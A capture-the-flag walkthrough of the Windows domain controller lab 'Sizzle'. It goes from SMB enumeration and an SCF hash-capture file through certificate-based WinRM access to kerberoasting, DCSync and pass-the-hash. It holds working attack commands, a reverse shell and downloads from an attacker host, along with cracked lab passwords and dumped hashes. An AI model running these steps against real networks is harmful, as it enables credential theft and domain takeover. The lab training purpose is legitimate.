Sizzle

Enumeration
As usual, we start with an nmap scan, in order to find open ports in the target machine.
The following nmap command will scan the target machine looking for open ports quickly and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.103 -oN allPorts
-sS
use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000
nmap will try to keep the sending rate at or above 5000 packets per second.-p-
scanning the entire port range, from 1 to 65535.-T5
insane mode, it is the fastest mode of the nmap time template.-Pn
assume the host is online.-n
scan without reverse DNS resolution.-oN
save the scan result into a file, in this case the allports file.
# Nmap 7.93 scan initiated Tue Mar 21 11:06:25 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.103
Nmap scan report for 10.10.10.103
Host is up (0.047s latency).
Not shown: 65506 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
5986/tcp open wsmans
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49677/tcp open unknown
49688/tcp open unknown
49689/tcp open unknown
49691/tcp open unknown
49694/tcp open unknown
49706/tcp open unknown
49710/tcp open unknown
49717/tcp open unknown
# Nmap done at Tue Mar 21 11:07:04 2023 -- 1 IP address (1 host up) scanned in 39.67 seconds
As we see, there are quite a lot of ports open.
Let's try to obtain the services and versions of these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p21,53,80,135,139,389,443,445,464,593,636,3268,3269,5985,5986,9389,47001,49664,49665,49666,49667,49677,49688,49689,49691,49694,49706,49710,49717 10.10.10.103 -oN targeted
-sC
performs the scan using the default set of scripts.-sV
enables version detection.-oN
save the scan result into file, in this case the targeted file.
# Nmap 7.93 scan initiated Tue Mar 21 11:10:41 2023 as: nmap -sCV -p21,53,80,135,139,389,443,445,464,593,636,3268,3269,5985,5986,9389,47001,49664,49665,49666,49667,49677,49688,49689,49691,49694,49706,49710,49717 -Pn -oN targeted 10.10.10.103
Nmap scan report for 10.10.10.103
Host is up (0.040s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2023-03-21T10:16:59+00:00; +4m34s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2023-03-21T10:16:59+00:00; +4m35s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap
|_ssl-date: 2023-03-21T10:16:59+00:00; +4m35s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2023-03-21T10:16:59+00:00; +4m35s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2023-03-21T10:16:59+00:00; +4m35s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2018-07-02T20:26:23
|_Not valid after: 2019-07-02T20:26:23
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
| h2
|_ http/1.1
|_ssl-date: 2023-03-21T10:16:59+00:00; +4m35s from scanner time.
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49688/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49689/tcp open msrpc Microsoft Windows RPC
49691/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
49710/tcp open msrpc Microsoft Windows RPC
49717/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 4m34s, deviation: 0s, median: 4m34s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-03-21T10:16:21
|_ start_date: 2023-03-21T10:02:36
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 21 11:12:26 2023 -- 1 IP address (1 host up) scanned in 104.84 seconds
As we can see, there are a lot of ports open. Let's start enumerating the SMB service. We can see the shares using a guest user.
smbmap -H 10.10.10.103 -u "guest"
[+] IP: 10.10.10.103:445 Name: htb.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll NO ACCESS Active Directory Certificate Services share
Department Shares READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
Operations NO ACCESS
SYSVOL NO ACCESS Logon server share
There is one share called Department Shares
with READ ONLY
permissions. This share contains a bunch of other subdirectories.
smbmap -H 10.10.10.103 -u "guest" -r "Department Shares"
[+] IP: 10.10.10.103:445 Name: htb.local
Disk Permissions Comment
---- ----------- -------
Department Shares READ ONLY
.\Department Shares\*
dr--r--r-- 0 Tue Jul 3 17:22:32 2018 .
dr--r--r-- 0 Tue Jul 3 17:22:32 2018 ..
dr--r--r-- 0 Mon Jul 2 21:21:43 2018 Accounting
dr--r--r-- 0 Mon Jul 2 21:14:28 2018 Audit
dr--r--r-- 0 Tue Jul 3 17:22:39 2018 Banking
dr--r--r-- 0 Mon Jul 2 21:15:01 2018 CEO_protected
dr--r--r-- 0 Mon Jul 2 21:22:06 2018 Devops
dr--r--r-- 0 Mon Jul 2 21:11:57 2018 Finance
dr--r--r-- 0 Mon Jul 2 21:16:11 2018 HR
dr--r--r-- 0 Mon Jul 2 21:14:24 2018 Infosec
dr--r--r-- 0 Mon Jul 2 21:13:59 2018 Infrastructure
dr--r--r-- 0 Mon Jul 2 21:12:04 2018 IT
dr--r--r-- 0 Mon Jul 2 21:12:09 2018 Legal
dr--r--r-- 0 Mon Jul 2 21:15:25 2018 M&A
dr--r--r-- 0 Mon Jul 2 21:14:43 2018 Marketing
dr--r--r-- 0 Mon Jul 2 21:11:47 2018 R&D
dr--r--r-- 0 Mon Jul 2 21:14:37 2018 Sales
dr--r--r-- 0 Mon Jul 2 21:21:46 2018 Security
dr--r--r-- 0 Mon Jul 2 21:16:54 2018 Tax
dr--r--r-- 0 Tue Jul 10 23:39:32 2018 Users
dr--r--r-- 0 Mon Jul 2 21:32:58 2018 ZZ_ARCHIVE
Inside the Users
directory, there are other subdirectories named as possible local system users.
smbmap -H 10.10.10.103 -u "guest" -r "Department Shares\Users"
[+] IP: 10.10.10.103:445 Name: htb.local
Disk Permissions Comment
---- ----------- -------
Department Shares READ ONLY
.\Department SharesUsers\*
dr--r--r-- 0 Tue Jul 10 23:39:32 2018 .
dr--r--r-- 0 Tue Jul 10 23:39:32 2018 ..
dr--r--r-- 0 Mon Jul 2 21:18:43 2018 amanda
dr--r--r-- 0 Mon Jul 2 21:19:06 2018 amanda_adm
dr--r--r-- 0 Mon Jul 2 21:18:28 2018 bill
dr--r--r-- 0 Mon Jul 2 21:18:31 2018 bob
dr--r--r-- 0 Mon Jul 2 21:19:14 2018 chris
dr--r--r-- 0 Mon Jul 2 21:18:39 2018 henry
dr--r--r-- 0 Mon Jul 2 21:18:34 2018 joe
dr--r--r-- 0 Mon Jul 2 21:18:53 2018 jose
dr--r--r-- 0 Tue Jul 10 23:39:32 2018 lkys37en
dr--r--r-- 0 Mon Jul 2 21:18:48 2018 morgan
dr--r--r-- 0 Mon Jul 2 21:19:20 2018 mrb3n
dr--r--r-- 0 Wed Sep 26 07:45:32 2018 Public
Now we have a list of users that might be helpful in the future. We could check if we have write permissions on any of these directories. As seen, everyone has full permissions on the Public directory.
smbcacls "//10.10.10.103/Department Shares" Users/Public -N
REVISION:1
CONTROL:SR|DI|DP
OWNER:BUILTIN\Administrators
GROUP:HTB\Domain Users
ACL:Everyone:ALLOWED/OI|CI/FULL
ACL:S-1-5-21-2379389067-1826974543-3574127760-1000:ALLOWED/OI|CI|I/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|I/FULL
ACL:Everyone:ALLOWED/OI|CI|I/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI|I/FULL
Exploitation
This means that we could upload files to that directory. We could try to create a SCF (Shell Command Files) file in the Public
directory. When this file gets executed by any user, it will try to load an icon from our machine, authenticating in our local SMB server, and giving us their NTLMv2 hash.
nano pwn.scf
[Shell]
Command=2
IconFile=\\10.10.14.11\smbFolder\pwn.ico
[Taskbar]
Command=ToggleDesktop
Now upload it to the Public
directory.
smbmap -H 10.10.10.103 -u "guest" --upload pwn.scf "Department Shares\Users\Public\pwn.scf"
Then, set the SMB server. If any user opens the file, it will try to load the icon from our SMB server, giving us their NTLMv2 hash.
impacket-smbserver smbFolder $(pwd) -smb2support
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.103,49303)
[*] AUTHENTICATE_MESSAGE (HTB\amanda,SIZZLE)
[*] User SIZZLE\amanda authenticated successfully
[*] amanda::HTB:aaaaaaaaaaaaaaaa:49dd44091b94b3f557a53d7cb7aa9a92:0101000000000000002e31e9255cd9010a5238f40c86656d000000000100100061007900550058006f00480065004d000300100061007900550058006f00480065004d000200100077005100460048005600510074004500040010007700510046004800560051007400450007000800002e31e9255cd90106000400020000000800300030000000000000000100000000200000bd5e1a6a5f1cc249073ee270b329409cdf07c12fc5a21f4f21f047786e2945680a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0031003100000000000000000000000000
[*] Connecting Share(1:IPC$)
[-] SMB2_TREE_CONNECT not found share
[-] SMB2_TREE_CONNECT not found share
Copy the hash, paste it into a file, and try to break it with john.
john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ashare1972 (amanda)
1g 0:00:00:04 DONE (2023-03-21 19:53) 0.2475g/s 2826Kp/s 2826Kc/s 2826KC/s Ashiah08..Ariel!
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
Let's keep enumerating the machine. As we saw in the nmap scan, port 5986 is open, and it hosts a WinRM server, but uses SSL certificates. We might need to create our own certificate to be able to log into the machine. Nmap also reported that port 80 is open. Let's take a look at it.

As we can see, the web server is a Microsoft IIS 10. Let's try to enumerate website subdirectories using a custom IIS wordlist.
gobuster dir -u http://10.10.10.103/ -w /opt/SecLists/Discovery/Web-Content/IIS.fuzz.txt -t 200 --no-error
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.103/
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/IIS.fuzz.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/03/21 19:58:28 Starting gobuster in directory enumeration mode
===============================================================
//images/ (Status: 403) [Size: 1233]
//<script>alert('XSS')</script>.aspx (Status: 400) [Size: 3420]
//~/<script>alert('XSS')</script>.aspx (Status: 400) [Size: 3420]
//certenroll/ (Status: 403) [Size: 1233]
//certsrv/ (Status: 401) [Size: 1293]
//aspnet_client/ (Status: 403) [Size: 1233]
//certsrv/mscep_admin (Status: 401) [Size: 1293]
//certsrv/mscep/mscep.dll (Status: 401) [Size: 1293]
===============================================================
2023/03/21 19:58:29 Finished
===============================================================
The certsrv
directory shows a 401 status code. If we take a look at it, it will ask for credentials. Let's use the ones we have.

We log into Active Directory Certificate Services.

This utility will allow us to create our certificate, and log in with the WinRM service using SSL certificates. First, create a private key and a certificate signing request.
openssl req -newkey rsa:2048 -nodes -keyout amanda.key -out amanda.csr
.+...+.......+.....+.+..+...+......+...+............+++++++++++++++++++++++++++++++++...+..+.............+...........+...+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
Now, on the website, go to Request a certificate
.

Then go to advanced certificate request
, copy and paste the amanda.csr
certificate signing request into the Saved Request filed, and press Submit.

Download the certificate by clicking on Download certificate
.

Finally, we can log into the machine using the WinRM service and the SSL certificates.
evil-winrm -i 10.10.10.103 -u 'MRLKY' -p 'Football#7' -S -c certnew.cer -k amanda.key
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\amanda\Documents> whoami
htb\amanda
Privilege Escalation
The shell that we have is quite limited. It is in constrained language mode.
$executioncontext.sessionstate.languagemode
ConstrainedLanguage
We need to bypass this limited shell. We can do it with the PSByPassCLM tool. Clone the repository, then go to PSBypassCLM/PSBypassCLM/bin/x64/Debug
, and set a simple HTTP server.
python -m http.server 80
Now, create the privEsc
folder inside \Windows\Temp
, and download the PsBypassCLM.exe
binary from our HTTP server there.
mkdir \windows\temp\privEsc; cd \windows\temp\privEsc
iwr http://10.10.14.11/PsBypassCLM.exe -outfile PsBypassCLM.exe
Now, set a netcat listener on port 4444.
rlwrap nc -lvnp 4444
Finally, run the following command, and catch the reverse shell, but this time with full language mode.
C:\windows\temp\privesc> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.14.11 /rport=4444 /U c:\windows\temp\privEsc\PsBypassCLM.exe
Listening on 0.0.0.0 4444
Connection received on 10.10.10.103 59777
whoami
htb\amanda
PS C:\windows\temp\privesc> $executioncontext.sessionstate.languagemode
FullLanguage
As we have credentials, we could run BloodHound remotely with the bloodhound-python tool. Make sure to the add htb.local
entry to the /etc/hosts
file.
bloodhound-python -c All -u 'amanda' -p 'Ashare1972' -ns 10.10.10.103 -d htb.local
INFO: Found AD domain: htb.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (htb.local:88)] [Errno 110] Connection timed out
INFO: Connecting to LDAP server: sizzle.HTB.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: sizzle.HTB.LOCAL
INFO: Found 8 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: sizzle.HTB.LOCAL
INFO: Done in 00M 08S
Now, we have to start BloodHound. First, we have to start neo4j.
neo4j console
Then we will search for the localhost on port 4747 and log in with the username neo4j and password neo4j. You’ll have to change the password.
On a new console, run BloodHound.
bloodhound -nosandbox
Then log in with the credentials you set earlier.

Then, click on the Upload Data button on the right section and select all the .json
files.

Once all the .json
files are uploaded go to the Analysis section. There we'll see that the user MRLKY
user a kerberoasteable account.

We can't exploit this vulnerability yet, because port 88 (Kerberos) is not exposed externally. We can also see that this user has DCSync rights, which we could exploit to gain domain admin privileges.

Let's start with the kerberoasting attack. As we can see Kerberos is only accessible internally.
netstat -nat
Active Connections
Proto Local Address Foreign Address State Offload State
...
TCP 0.0.0.0:88 0.0.0.0:0 LISTENING InHost
...
To exploit this vulnerability, we'll have to use Rubeus. Set a simple HTTP server where the Rubeus.exe
binary is located.
python -m http.server 80
Download the file from the victim machine.
iwr http://10.10.14.11/Rubeus.exe -outfile Rubeus.exe
Finally, exploit the kerberoasting vulnerability using the credentials of the amanda
user. We should get the hash of the MRLKY
user.
.\Rubeus.exe kerberoast /creduser:htb.local\amanda /credpassword:Ashare1972
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.0.2
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : HTB.LOCAL
[*] Searching path 'LDAP://sizzle.HTB.LOCAL/DC=HTB,DC=LOCAL' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 1
[*] SamAccountName : mrlky
[*] DistinguishedName : CN=mrlky,CN=Users,DC=HTB,DC=LOCAL
[*] ServicePrincipalName : http/sizzle
[*] PwdLastSet : 7/10/2018 2:08:09 PM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*mrlky$HTB.LOCAL$http/sizzle@HTB.LOCAL*$1195793B964FAC38DC1FBB2DD6B5
ED45$B5E46E7FC7822CFDC0DFA72D985BC6723E78FFE6FCFAC18A5231DD1492A17DCAA82D6A8EA6C
0069947AB0A5163D65A2BB03C84789875441463E2C92C45F4F37A701D6879A9B6C2CB16D0D8F1F70
3D9B237EE2040AB5C55062944739CB898B610E08F7080B600BD95771942CE48C715579520B58B668
9775A335BAA43CB8A0EBB0291B91820B211ED530FFF4731694C001C1CC1EF92FCC1A05ECA4E66E29
86F7E58A327EC1D74B191CA0356C052DACD344E43A7A3CAA16122EB2D3574B2D78AB0C726BA6E0A4
35FA203E8796BCB8EB1D2642726C8774E749E0B602B8AC3A14F90D47ECFB0DE29FF10A436FA16313
6EACC64D4B906D636D54AE62427D5295EAE0E6BF991BE2CFCAC28F5700DC2EBB6E2490C782637295
7C16D1B1D23243B6A5ED2CDC6698B1B81B58EB95D6BE0DFC62C3DD1F2B97E40DD2DC58C33A65CD1A
E32C2D560AC77599017183DF7394C3B06DCA25A9F35C5664026AEE07641035BE35D807B22A40FD9F
14C12E0FE77237F6DD7859D19320596B6559D92BA1BFE2B0756F5FD50B670D69E0C32420686294AC
C78F00825E4647084E143BFA84E2B45487D175F3455E55A43FD85F70E32DB4A18CFD73E7C00A833A
EC3ED5AC9D2B3D725CB3DADEEFF7C1BB18E41FCABF57B3FE2FB3481B2830D7FC85833E288408A6F2
A084446749CF53F7B83A619FD90AADB6782D76FFC6733B3B9422C1F4AA133CD7DE7400739FCC7584
6D51CF130CD78C6332ACE0A8A68DDBA75F3F75F2E956AE23A60FC8286A6BFE683B347B4E11414410
04538C1924E334C3AEE6C17A6D94C13CBF29AD92B707A096CDC9DDF2D24BD1A0D261CA26907A9522
988D90D85D5972D92477405F26DA8DA9FFCD174EF5504265DA3F43149030B50FF8D9405C0BDAF49B
57C452555D8BE3159E44F4F8479B52DC10DB69CB670B5A129698135847D036519E4F7CB493D05BD2
5FE1F57400F26100455D4F98A8FE6ADD740E2B28F88A1ADA8BDB021BA94DAB863360AEBA2CE52BCC
4B0DAF40BF4BA5CBB6FDAF1495BFF49AFB461CD7C6872EAFFFC8057A57FABCC987E261330165E862
8827EAACE6FF7FD1729073F9A2E5498C8558B3277ED0FCD22C60E6E47AC32459AC963562EA17672C
DBE16DE589055E657DFAB15392D89696017F1BC64D78CAB7F90E0730DE7039E3E8511059CE85861A
F7082CEFF64F34F232CB4D8A6069471E7C52FA03041CDE1836C11D812FDE2C5213C6CA6F447B2C68
F11F3503F036678E8457B5C406C2BBFF8E0D62C67353E22AB5DA9D0A6E947F3D47113B2280AE6647
6AE2E2BB751ED3915C5FC260D9CF85B46226F6772F7323C42E35BE318F1ABDA0CE53E46B6CE062E4
74A4BFFA7E796138A
Copy the hash, and break it with john.
john -w=/usr/share/wordlists/rockyou.txt kerb_hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Football#7 (?)
1g 0:00:00:04 DONE (2023-03-21 21:08) 0.2247g/s 2509Kp/s 2509Kc/s 2509KC/s Forever3!..Flubb3r
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Now that we have credentials for MRLKY, and as it has DCSync rights, we can dump hashes of every local user remotely with secrets-dump.
impacket-secretsdump htb.local/mrlky:'Football#7'@10.10.10.103
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:296ec447eee58283143efbd5d39408c8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
amanda:1104:aad3b435b51404eeaad3b435b51404ee:7d0516ea4b6ed084f3fdf71c47d9beb3:::
mrlky:1603:aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef:::
sizzler:1604:aad3b435b51404eeaad3b435b51404ee:d79f820afad0cbc828d79e16a6f890de:::
SIZZLE$:1001:aad3b435b51404eeaad3b435b51404ee:1797d4bb27f59619665045685d5bb21a:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:e562d64208c7df80b496af280603773ea7d7eeb93ef715392a8258214933275d
Administrator:aes128-cts-hmac-sha1-96:45b1a7ed336bafe1f1e0c1ab666336b3
Administrator:des-cbc-md5:ad7afb706715e964
krbtgt:aes256-cts-hmac-sha1-96:0fcb9a54f68453be5dd01fe555cace13e99def7699b85deda866a71a74e9391e
krbtgt:aes128-cts-hmac-sha1-96:668b69e6bb7f76fa1bcd3a638e93e699
krbtgt:des-cbc-md5:866db35eb9ec5173
amanda:aes256-cts-hmac-sha1-96:60ef71f6446370bab3a52634c3708ed8a0af424fdcb045f3f5fbde5ff05221eb
amanda:aes128-cts-hmac-sha1-96:48d91184cecdc906ca7a07ccbe42e061
amanda:des-cbc-md5:70ba677a4c1a2adf
mrlky:aes256-cts-hmac-sha1-96:b42493c2e8ef350d257e68cc93a155643330c6b5e46a931315c2e23984b11155
mrlky:aes128-cts-hmac-sha1-96:3daab3d6ea94d236b44083309f4f3db0
mrlky:des-cbc-md5:02f1a4da0432f7f7
sizzler:aes256-cts-hmac-sha1-96:85b437e31c055786104b514f98fdf2a520569174cbfc7ba2c895b0f05a7ec81d
sizzler:aes128-cts-hmac-sha1-96:e31015d07e48c21bbd72955641423955
sizzler:des-cbc-md5:5d51d30e68d092d9
SIZZLE$:aes256-cts-hmac-sha1-96:e985e3242ddab2d401376c3527d531494d3144eeb54af63c0ec63cfeeda820ac
SIZZLE$:aes128-cts-hmac-sha1-96:122ee362400920a3a62f093461beb364
SIZZLE$:des-cbc-md5:405de57037dc32ea
[*] Cleaning up...
As we have to NTLM hash of the administrator user, we could do pass the hash and get a shell as nt authority\system
. Then all we have to do is reap the harvest and take both the user and root flags.
impacket-psexec htb.local/administrator@10.10.10.103 -hashes aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.103.....
[*] Found writable share ADMIN$
[*] Uploading file ftRDykyJ.exe
[*] Opening SVCManager on 10.10.10.103.....
[*] Creating service zRZi on 10.10.10.103.....
[*] Starting service zRZi.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> type \users\mrlky\desktop\user.txt
168224d790f5c7ef7113300aeceb7e9d
C:\Windows\system32> type \users\administrator\desktop\root.txt
83db2d37e4884fb0beadde14a9d025b7
Last updated
Was this helpful?